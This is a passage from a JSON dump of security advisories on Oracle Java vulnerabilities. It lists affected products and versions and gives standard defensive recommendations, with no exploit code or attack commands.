1000M 7.5 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Server Edition 8.1 \n * Avaya Meeting Exchange 5.2 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Avaya Voice Portal 5.1.3 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Fedoraproject Fedora 19 \n * Gentoo Linux \n * IBM Intelligent Operations Center 1.5 \n * IBM Intelligent Operations Center 1.5.0.1 \n * IBM Intelligent Operations Center 1.5.0.2 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Java SE 6 \n * IBM Java SE 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.0.2.1 \n * IBM Lotus Domino 8.0.2.2 \n * IBM Lotus Domino 8.0.2.3 \n * IBM Lotus Domino 8.0.2.4 \n * IBM Lotus Domino 8.5.0 \n * IBM Lotus Domino 8.5.0.1 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.1.1 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Domino 8.5.4 \n * IBM Lotus Domino 9.0 \n * IBM Lotus Notes 8.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.0.2.1 \n * IBM Lotus Notes 8.0.2.2 \n * IBM Lotus Notes 8.0.2.3 \n * IBM Lotus Notes 8.0.2.4 \n * IBM Lotus Notes 8.0.2.5 \n * IBM Lotus Notes 8.0.2.6 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.0.1 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.1.2 \n * IBM Lotus Notes 8.5.1.3 \n * IBM Lotus Notes 8.5.1.4 \n * IBM Lotus Notes 8.5.1.5 \n * IBM Lotus Notes 8.5.2 \n * IBM Lotus Notes 8.5.2.1 \n * IBM Lotus Notes 8.5.2.2 \n * IBM Lotus Notes 8.5.2.3 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 9.0 \n * IBM Maximo Asset Management 6.2 \n * IBM Maximo Asset Management 6.2.1 \n * IBM Maximo Asset Management 6.2.2 \n * IBM Maximo Asset Management 6.2.3 \n * IBM Maximo Asset Management 6.2.4 \n * IBM Maximo Asset Management 6.2.5 \n * IBM Maximo Asset Management 6.2.6 \n * IBM Maximo Asset Management 6.2.7 \n * IBM Maximo Asset Management 6.2.8 \n * IBM Maximo Asset Management 7.1 \n * IBM Maximo Asset Management 7.1.1 \n * IBM Maximo Asset Management 7.1.2 \n * IBM Maximo Asset Management 7.2 \n * IBM Maximo Asset Management 7.2.1 \n * IBM Maximo Asset Management 7.5 \n * IBM Maximo Asset Management Essentials 6.2 \n * IBM Maximo Asset Management Essentials 7.1 \n * IBM Maximo Asset Management Essentials 7.5 \n * IBM Operational Decision Manager 8.0 \n * IBM Operational Decision Manager 8.5 \n * IBM Rational Host On-Demand 11.0.0 \n * IBM Rational Host On-Demand 11.0.7 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.3.0 \n * IBM Tivoli Endpoint Manager for Remote Control 9.0.0 \n * IBM Tivoli Monitoring 6.2.0 \n * IBM Tivoli Monitoring 6.2.1 \n * IBM Tivoli Monitoring 6.2.2 \n * IBM Tivoli Monitoring 6.2.3 \n * IBM Tivoli Monitoring 6.3.0 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.1 \n * IBM Tivoli System Automation (TSA) for Multiplatforms 3.2.2 \n * IBM Tivoli System Automation Application Manager 3.1 \n * IBM Tivoli System Automation Application Manager 3.2 \n * IBM Tivoli System Automation Application Manager 3.2.1 \n * IBM Tivoli System Automation Application Manager 3.2.2 \n * IBM Tivoli System Automation for Integrated Operations Management 2.1 \n * IBM Virtualization Engine TS7700 \n * IBM WebSphere ILOG JRules 7.1 \n * IBM WebSphere Operational Decision Management 7.5.0.0 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_17 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_17 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE (Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_17 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_17 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_17 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server EUS 6.4.z \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE openSUSE 12.2 \n * Sun JRE (Linux Production Release) 1.7 \n * Sun JRE (Solaris Production Release) 1.7 \n * Sun JRE (Windows Production Release) 1.7 \n * Ubuntu Ubuntu Linux 12.10 amd64 \n * Ubuntu Ubuntu Linux 12.10 i386 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "modified": "2013-04-16T00:00:00", "published": "2013-04-16T00:00:00", "id": "SMNTC-59162", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/59162", "type": "symantec", "title": "Oracle Java Runtime Environment CVE-2013-2423 Security Bypass Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T06:25:14", "bulletinFamily": "software", "cvelist": ["CVE-2011-3544", "CVE-2013-1347"], "description": "### Description\n\nOracle Java SE is prone to a remote code-execution vulnerability in Java Runtime Environment. The vulnerability can be exploited over multiple protocols. This issue affects the 'Scripting' sub-component. This vulnerability affects the following supported versions: JDK and JRE 7, 6 Update 27\n\n### Technologies Affected\n\n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Apple Mac OS X Server 10.6.5 \n * Apple Mac OS X Server 10.6.6 \n * Apple Mac OS X Server 10.6.7 \n * Apple Mac OS X Server 10.6.8 \n * Apple Mac OS X Server 10.7 \n * Apple Mac OS X Server 10.7.1 \n * Apple Mac OS X Server 10.7.2 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Conferencing 6.0 Standard \n * Avaya Aura Conferencing 6.0.0 Standard \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura SIP Enablement Services 4.0 \n * Avaya Aura SIP Enablement Services 5.0 \n * Avaya Aura SIP Enablement Services 5.1 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 1.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya CMS Server 15.0 \n * Avaya CMS Server 15.0 AUX \n * Avaya CMS Server 16.0 \n * Avaya CMS Server 16.1 \n * Avaya CMS Server 16.2 \n * Avaya IP Office Application Server 6.0 \n * Avaya IP Office Application Server 6.1 \n * Avaya IP Office Application Server 7.0 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya IR 4.0 \n * Avaya Interactive Response 4.0 \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 5.0 SP1 \n * Avaya Meeting Exchange 5.0 SP2 \n * Avaya Meeting Exchange 5.0.0.0.52 \n * Avaya Meeting Exchange 5.1 \n * Avaya Meeting Exchange 5.1 SP1 \n * Avaya Meeting Exchange 5.2 \n * Avaya Meeting Exchange 5.2 SP1 \n * Avaya Meeting Exchange 5.2 SP2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Storage Server 5.2 \n * Avaya Messaging Storage Server 5.2 SP1 \n * Avaya Messaging Storage Server 5.2 SP2 \n * Avaya Messaging Storage Server 5.2 SP3 \n * Avaya Messaging Storage Server 5.2.2 \n * Avaya Messaging Storage Server 5.2.8 \n * Avaya Proactive Contact 4.0 \n * Avaya Proactive Contact 4.0.1 \n * Avaya Proactive Contact 4.1 \n * Avaya Proactive Contact 4.1.1 \n * Avaya Proactive Contact 4.1.2 \n * Avaya Proactive Contact 4.2 \n * Avaya Proactive Contact 4.2.1 \n * Avaya Proactive Contact 4.2.2 \n * Avaya Proactive Contact 5.0 \n * Avaya Voice Portal 4.0 \n * Avaya Voice Portal 4.1 \n * Avaya Voice Portal 4.1 SP1 \n * Avaya Voice Portal 4.1 SP2 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.0 SP2 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 SP1 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Fedoraproject Fedora 14 \n * Fedoraproject Fedora 15 \n * Fedoraproject Fedora 16 \n * Gentoo Linux \n * HP HP-UX B.11.11 \n * HP HP-UX B.11.23 \n * HP HP-UX B.11.31 \n * HP Network Node Manager i 9.1 \n * HP NonStop Server H06.15.00 \n * HP NonStop Server H06.15.01 \n * HP NonStop Server H06.15.02 \n * HP NonStop Server H06.16.00 \n * HP NonStop Server H06.16.01 \n * HP NonStop Server H06.16.02 \n * HP NonStop Server H06.17.00 \n * HP NonStop Server H06.17.01 \n * HP NonStop Server H06.17.02 \n * HP NonStop Server H06.17.03 \n * HP NonStop Server H06.18.00 \n * HP NonStop Server H06.18.01 \n * HP NonStop Server H06.18.02 \n * HP NonStop Server H06.19.00 \n * HP NonStop Server H06.19.01 \n * HP NonStop Server H06.19.02 \n * HP NonStop Server H06.19.03 \n * HP NonStop Server H06.20.00 \n * HP NonStop Server H06.20.01 \n * HP NonStop Server H06.20.02 \n * HP NonStop Server H06.20.03 \n * HP NonStop Server H06.21.00 \n * HP NonStop Server H06.21.01 \n * HP NonStop Server H06.21.02 \n * HP NonStop Server H06.22.00 \n * HP NonStop Server H06.22.01 \n * HP NonStop Server H06.23 \n * HP NonStop Server H06.24 \n * HP NonStop Server H06.24.01 \n * HP NonStop Server H06.25 \n * HP NonStop Server H06.25.01 \n * HP NonStop Server H06.26 \n * HP NonStop Server H06.26.01 \n * HP NonStop Server H06.27 \n * HP NonStop Server J06.04.00 \n * HP NonStop Server J06.04.01 \n * HP NonStop Server J06.04.02 \n * HP NonStop Server J06.05.00 \n * HP NonStop Server J06.05.01 \n * HP NonStop Server J06.05.02 \n * HP NonStop Server J06.06.00 \n * HP NonStop Server J06.06.01 \n * HP NonStop Server J06.06.02 \n * HP NonStop Server J06.06.03 \n * HP NonStop Server J06.07.00 \n * HP NonStop Server J06.07.01 \n * HP NonStop Server J06.07.02 \n * HP NonStop Server J06.08.00 \n * HP NonStop Server J06.08.01 \n * HP NonStop Server J06.08.02 \n * HP NonStop Server J06.08.03 \n * HP NonStop Server J06.08.04 \n * HP NonStop Server J06.09.00 \n * HP NonStop Server J06.09.01 \n * HP NonStop Server J06.09.02 \n * HP NonStop Server J06.09.03 \n * HP NonStop Server J06.09.04 \n * HP NonStop Server J06.10.00 \n * HP NonStop Server J06.10.01 \n * HP NonStop Server J06.10.02 \n * HP NonStop Server J06.11.00 \n * HP NonStop Server J06.11.01 \n * HP NonStop Server J06.12.00 \n * HP NonStop Server J06.13 \n * HP NonStop Server J06.13.01 \n * HP NonStop Server J06.14 \n * HP NonStop Server J06.14.02 \n * HP NonStop Server J06.15 \n * HP NonStop Server J06.15.01 \n * HP NonStop Server J06.16 \n * HP NonStop Server J6.0.14.01 \n * IBM Java SE 6 \n * IBM Java SE 6 SR8 FP1 \n * IBM Java SE 6.0 \n * IBM Java SE 6.0 SR5 \n * IBM Java SE 6.0 SR6 \n * IBM Java SE 6.0 SR7 \n * IBM Java SE 6.0.0 SR9 \n * IBM Java SE 6.0.0 SR9-FP2 \n * IBM Java SE 7 \n * IBM Java SE 7.0 \n * IBM Rational AppScan Enterprise 8.0.0 \n * IBM Rational AppScan Enterprise 8.0.0.1 \n * IBM Rational AppScan Enterprise 8.0.1 \n * IBM Rational AppScan Enterprise 8.0.1.1 \n * IBM Rational AppScan Enterprise 8.5.0.1 \n * IBM Rational AppScan Enterprise 8.6 \n * IBM Rational AppScan Standard 7.8 \n * IBM Rational AppScan Standard 8.0.0 \n * IBM Rational AppScan Standard 8.0.0.3 \n * IBM Rational AppScan Standard 8.5.0.1 \n * IBM Rational Policy Tester 8.0 \n * IBM Rational Policy Tester 8.5 \n * IBM Rational Policy Tester 8.5.0.1 \n * Mandriva Enterprise Server 5 \n * Mandriva Enterprise Server 5 X86 64 \n * Mandriva Linux Mandrake 2010.1 \n * Mandriva Linux Mandrake 2010.1 X86 64 \n * Mandriva Linux Mandrake 2011 \n * Mandriva Linux Mandrake 2011 x86_64 \n * OpenJDK OpenJDK 1.6.0 \n * OpenJDK OpenJDK 6 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle JDK (Linux Production Release) 1.6.0_22 \n * Oracle JDK (Linux Production Release) 1.6.0_23 \n * Oracle JDK (Linux Production Release) 1.6.0_24 \n * Oracle JDK (Linux Production Release) 1.6.0_25 \n * Oracle JDK (Linux Production Release) 1.6.0_26 \n * Oracle JDK (Linux Production Release) 1.6.0_27 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.6.0_22 \n * Oracle JDK (Solaris Production Release) 1.6.0_23 \n * Oracle JDK (Solaris Production Release) 1.6.0_24 \n * Oracle JDK (Solaris Production Release) 1.6.0_25 \n * Oracle JDK (Solaris Production Release) 1.6.0_26 \n * Oracle JDK (Solaris Production Release) 1.6.0_27 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.6.0_22 \n * Oracle JDK (Windows Production Release) 1.6.0_23 \n * Oracle JDK (Windows Production Release) 1.6.0_24 \n * Oracle JDK (Windows Production Release) 1.6.0_25 \n * Oracle JDK (Windows Production Release) 1.6.0_26 \n * Oracle JDK (Windows Production Release) 1.6.0_27 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JRE (Linux Production Release) 1.6.0_22 \n * Oracle JRE (Linux Production Release) 1.6.0_23 \n * Oracle JRE (Linux Production Release) 1.6.0_24 \n * Oracle JRE (Linux Production Release) 1.6.0_25 \n * Oracle JRE (Linux Production Release) 1.6.0_26 \n * Oracle JRE (Linux Production Release) 1.6.0_27 \n * Oracle JRE (Solaris Production Release) 1.6.0_22 \n * Oracle JRE (Solaris Production Release) 1.6.0_23 \n * Oracle JRE (Solaris Production Release) 1.6.0_24 \n * Oracle JRE (Solaris Production Release) 1.6.0_25 \n * Oracle JRE (Solaris Production Release) 1.6.0_26 \n * Oracle JRE (Solaris Production Release) 1.6.0_27 \n * Oracle JRE (Windows Production Release) 1.6.0_22 \n * Oracle JRE (Windows Production Release) 1.6.0_23 \n * Oracle JRE (Windows Production Release) 1.6.0_24 \n * Oracle JRE (Windows Production Release) 1.6.0_25 \n * Oracle JRE (Windows Production Release) 1.6.0_26 \n * Oracle JRE (Windows Production Release) 1.6.0_27 \n * Panda Antivirus 1.6.0 Update 1 \n * Panda Antivirus 1.6.0 Update 10 \n * Panda Antivirus 1.6.0 Update 11 \n * Panda Antivirus 1.6.0 Update 12 \n * Panda Antivirus 1.6.0 Update 13 \n * Panda Antivirus 1.6.0 Update 14 \n * Panda Antivirus 1.6.0 Update 15 \n * Panda Antivirus 1.6.0 Update 16 \n * Panda Antivirus 1.6.0 Update 17 \n * Panda Antivirus 1.6.0 Update 18 \n * Panda Antivirus 1.6.0 Update 19 \n * Panda Antivirus 1.6.0 Update 2 \n * Panda Antivirus 1.6.0 Update 20 \n * Panda Antivirus 1.6.0 Update 21 \n * Panda Antivirus 1.6.0 Update 3 \n * Panda Antivirus 1.6.0 Update 4 \n * Panda Antivirus 1.6.0 Update 5 \n * Panda Antivirus 1.6.0 Update 6 \n * Panda Antivirus 1.6.0 Update 7 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Schneider-Electric Trio TView Software 3.27.0 \n * SuSE SUSE Linux Enterprise Java 10 SP4 \n * SuSE SUSE Linux Enterprise Java 11 SP1 \n * SuSE SUSE Linux Enterprise SDK 11 SP1 \n * SuSE SUSE Linux Enterprise Server 10 SP4 \n * SuSE SUSE Linux Enterprise Server 11 SP1 \n * SuSE SUSE Linux Enterprise Server 11 SP1 for SP2 \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP1 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP1 for SP2 \n * Sun JDK (Linux Production Release) 1.6.0 17 \n * Sun JDK (Linux Production Release) 1.6.0 01 \n * Sun JDK (Linux Production Release) 1.6.0 01-B06 \n * Sun JDK (Linux Production Release) 1.6.0 02 \n * Sun JDK (Linux Production Release) 1.6.0 03 \n * Sun JDK (Linux Production Release) 1.6.0 04 \n * Sun JDK (Linux Production Release) 1.6.0 05 \n * Sun JDK (Linux Production Release) 1.6.0 06 \n * Sun JDK (Linux Production Release) 1.6.0 07 \n * Sun JDK (Linux Production Release) 1.6.0 10 \n * Sun JDK (Linux Production Release) 1.6.0 11 \n * Sun JDK (Linux Production Release) 1.6.0 13 \n * Sun JDK (Linux Production Release) 1.6.0 14 \n * Sun JDK (Linux Production Release) 1.6.0 15 \n * Sun JDK (Linux Production Release) 1.6.0 18 \n * Sun JDK (Linux Production Release) 1.6.0 19 \n * Sun JDK (Linux Production Release) 1.6.0 20 \n * Sun JDK (Linux Production Release) 1.6.0 \n * Sun JDK (Linux Production Release) 1.6.0 Update 10 \n * Sun JDK (Linux Production Release) 1.6.0 Update 11 \n * Sun JDK (Linux Production Release) 1.6.0 Update 12 \n * Sun JDK (Linux Production Release) 1.6.0 Update 13 \n * Sun JDK (Linux Production Release) 1.6.0 Update 14 \n * Sun JDK (Linux Production Release) 1.6.0 Update 15 \n * Sun JDK (Linux Production Release) 1.6.0 Update 16 \n * Sun JDK (Linux Production Release) 1.6.0 Update 17 \n * Sun JDK (Linux Production Release) 1.6.0 Update 18 \n * Sun JDK (Linux Production Release) 1.6.0 Update 19 \n * Sun JDK (Linux Production Release) 1.6.0 Update 20 \n * Sun JDK (Linux Production Release) 1.6.0 Update 21 \n * Sun JDK (Linux Production Release) 1.6.0 Update 3 \n * Sun JDK (Linux Production Release) 1.6.0 Update 4 \n * Sun JDK (Linux Production Release) 1.6.0 Update 5 \n * Sun JDK (Linux Production Release) 1.6.0 Update 6 \n * Sun JDK (Linux Production Release) 1.6.0 Update 7 \n * Sun JDK (Linux Production Release) 1.6.0_21 \n * Sun JDK (Solaris Production Release) 1.6.0 17 \n * Sun JDK (Solaris Production Release) 1.6.0 01 \n * Sun JDK (Solaris Production Release) 1.6.0 01-B06 \n * Sun JDK (Solaris Production Release) 1.6.0 02 \n * Sun JDK (Solaris Production Release) 1.6.0 03 \n * Sun JDK (Solaris Production Release) 1.6.0 04 \n * Sun JDK (Solaris Production Release) 1.6.0 05 \n * Sun JDK (Solaris Production Release) 1.6.0 06 \n * Sun JDK (Solaris Production Release) 1.6.0 07 \n * Sun JDK (Solaris Production Release) 1.6.0 10 \n * Sun JDK (Solaris Production Release) 1.6.0 11 \n * Sun JDK (Solaris Production Release) 1.6.0 13 \n * Sun JDK (Solaris Production Release) 1.6.0 14 \n * Sun JDK (Solaris Production Release) 1.6.0 15 \n * Sun JDK (Solaris Production Release) 1.6.0 18 \n * Sun JDK (Solaris Production Release) 1.6.0 19 \n * Sun JDK (Solaris Production Release) 1.6.0 20 \n * Sun JDK (Solaris Production Release) 1.6.0 \n * Sun JDK (Solaris Production Release) 1.6.0_21 \n * Sun JDK (Windows Production Release) 1.6.0 17 \n * Sun JDK (Windows Production Release) 1.6.0 01 \n * Sun JDK (Windows Production Release) 1.6.0 01-B06 \n * Sun JDK (Windows Production Release) 1.6.0 02 \n * Sun JDK (Windows Production Release) 1.6.0 03 \n * Sun JDK (Windows Production Release) 1.6.0 04 \n * Sun JDK (Windows Production Release) 1.6.0 05 \n * Sun JDK (Windows Production Release) 1.6.0 06 \n * Sun JDK (Windows Production Release) 1.6.0 07 \n * Sun JDK (Windows Production Release) 1.6.0 10 \n * Sun JDK (Windows Production Release) 1.6.0 